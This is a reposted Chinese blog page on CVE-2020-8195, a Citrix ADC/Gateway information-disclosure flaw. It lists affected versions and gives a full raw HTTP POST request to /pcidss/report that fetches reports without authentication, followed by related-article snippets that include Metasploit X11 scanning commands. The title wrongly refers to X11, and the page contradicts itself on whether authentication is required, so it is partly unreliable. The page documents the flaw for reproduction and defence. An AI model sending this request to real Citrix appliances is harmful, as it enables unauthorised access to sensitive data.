Linux的X11未授权访问漏洞,CVE-2020-8195-Citrix-未授权访问漏洞

最新推荐文章于 2022-12-04 16:58:58 发布
最新推荐文章于 2022-12-04 16:58:58 发布
阅读量3.3k 收藏
点赞数
文章标签: Linux的X11未授权访问漏洞

(CVE-2020-8195)Citrix 未授权访问漏洞

一、漏洞简介

Citrix ADC和Citrix NetScaler

Gateway存在一个信息泄露漏洞,该漏洞允许经过身份验证的远程恶意用户获取主机上的敏感信息。通过发送特制请求,攻击者可以利用此漏洞获取敏感信息,然后使用此信息对受影响的系统发起进一步的攻击。

二、漏洞影响

Citrix ADC and Citrix Gateway: < 13.0-58.30

Citrix ADC and NetScaler Gateway: < 12.1-57.18

Citrix ADC and NetScaler Gateway: < 12.0-63.21

Citrix ADC and NetScaler Gateway: < 11.1-64.14

NetScaler ADC and NetScaler Gateway: < 10.5-70.18

Citrix SD-WAN WANOP: < 11.1.1a

Citrix SD-WAN WANOP: < 11.0.3d

Citrix SD-WAN WANOP: < 10.2.7

Citrix Gateway Plug-in for Linux: <  1.0.0.137

三、复现过程Citrix 默认签名处允许使用以下HTTP请求下载报告而无需进行身份验证POST /pcidss/report?type=all_signatures&sid=254&username=nsroot&profile_name=default&set=0&sig_name=_default_signature_&sig_start_no=1 HTTP/1.1

Host: www.0-sec.org

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://citrix.local/pcidss/launch_report?type=main

Content-Type: application/xml

Content-Length: 0

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

1.png

邵天兰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LinuxX11授权访问漏洞,CouchDB授权访问漏洞导致系统命令执行
weixin_42390092的博客
05-13 2250
阅读:3,860一个配置不当导致CouchDB数据库存在授权访问漏洞,数据信息全部泄露,由于CouchDB的特性可能导致系统命令执行,目前已经被批量利用了!【背景介绍】CouchDB是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB 可以安装在大部分 POSIX 系统上,包括 Linux...
linux x11协议漏洞怎么关闭,X.Org X11本地权限提升和内存泄露漏洞
weixin_42382748的博客
05-13 359
发布日期:2011-10-06更新日期:2011-10-10受影响系统:RedHat Enterprise LinuxX.org X11R6 6.xX.org X11R6 5.1X.org X11R6 4.0X.org X11R7 7.xX.org X11R7 1.1.1X.org X11R7 1.0.2X.org X11R7 1.0.1描述:---------------------------...
漏洞学习——授权访问】哇哈哈一处授权访问
Fly_鹏程万里
02-22 382
漏洞细节 哇哈哈一处授权访问 hr1.wahaha.com.cn/kb 安全建议:做好访问权限控制 参见:https://bugs.shuimugan.com/bug/view?bug_no=171471
【转载】Citrix Systems产品安全漏洞最新POC---CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 poc
安道实验室
07-14 1556
Citrix 简介 Citrix Systems Citrix Application Delivery Controller(ADC)等都是美国思杰系统(Citrix Systems)公司的产品。Citrix Application Delivery Controller是一款应用交付控制器。Citrix Systems Gateway(Citrix Systems NetScaler Gateway)是一套安全的远程接入解决方案。Citrix System SDWAN WAN-OP是一款SD-WAN(虚
X11 Server 发现 23 年历史的安全漏洞
weixin_33726318的博客
06-01 1497
X.Org基金会宣布,他们使用cppcheck静态分析工具扫描源码时发现了一个上溯至1991年的安全漏洞。该安全漏洞可能会导致栈缓冲区溢出,可被利用提升到root权限,该漏洞影响X11R5(1991年发布)后的所有版本。 提权漏洞存在于libXfont中,X.Org已发布补丁修复了漏洞。 文章转载自 开源中国社区 [http://www.oschina....
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-13957 Apache Solr 授权上传.md
04-13
CVE-2020-13957 Apache Solr 授权上传
Linux服务器发现授权登录用户
Damys
03-13 992
Linux服务器发现授权登录用户 [root@iZ94i61m4pcA ~]# w 09:19:54 up 16 days, 22:09, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 1...
各种授权访问漏洞的复现与利用
Shanfenglan's blog
11-30 1153
文章目录1. rsync1.1 利用1. 下载文件2. 上传文件3. 上传文件拿shell2. Jupyter Noteboo2.1 利用3. hadoop3.1 利用4. CouchDB4.1 利用参考文章 1. rsync Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
MSF扫描开放的X11服务器
Ethan024的博客
06-28 508
X11服务器允许用户无需身份认证即可连接 加载扫描器并查看选项: msf6 > use auxiliary/scanner/x11/open_x11 msf6 auxiliary(scanner/x11/open_x11) > show options 设置目标地址和线程: msf6 auxiliary(scanner/x11/open_x11) > set rhosts 192.168.168.0/24 msf6 auxiliary(scanner/x11/open_x11) &gt
检测到远端X服务正在运行中(CVE-1999-0526)漏洞解决
热门推荐
看着博客敲代码
04-16 1万+
检测到远端X服务正在运行中(CVE-1999-0526), 详细描述: X11协议是一种基于客户端/服务器模型的协议。X Server监听在6000/TCP端口,接受客户端发来的各种命令请求,服务器执行完命令后将事件返回给客户端。 如果允许从任意IP连接X Server的话,攻击者可能登录X Server并记录使用同一X Server的其它X Client的所有击键操作,这将包括帐号、密码等敏感信息。 解决方案: 查看默认的target [root@localhost ~]# systemctl get-d
安全RCE之授权访问分析
kali_Ma的博客
12-03 573
前言 安全研究员vakzz于4月7日在hackerone上提交了一个关于gitlab的RCE漏洞,在当时并没有提及是否需要登录gitlab进行授权利用,在10月25日该漏洞被国外安全公司通过日志分析发现授权的在野利用,并发现了新的利用方式。根据官方漏洞通告页面得知安全的版本为13.10.3、13.9.6 和 13.8.8。本篇将复现分析携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的 gitlab介绍 GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库
Metasploit渗透测试指南 学习笔记
最新发布
weixin_56223343的博客
12-04 794
阅读《Metasploit渗透测试指南》读书笔记
检测到远端X服务正在运行中(CVE-1999-0526)解决方案
weixin_55821558的博客
08-24 2744
如果允许从任意IP连接X Server的话,攻击者可能登录X Server并记录使用同一X Server的其它X Client的所有击键操作,这将包括帐号、密码等敏感信息。X11协议是一种基于客户端/服务器模型的协议。X Server监听在6000/TCP端口,接受客户端发来的各种命令请求,服务器执行完命令后将事件返回给客户端。原文链接:https://blog.csdn.net/qq_46023525/article/details/115758507。查看默认的target。
MSF之漏洞复现
mackilo的博客
11-08 8380
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值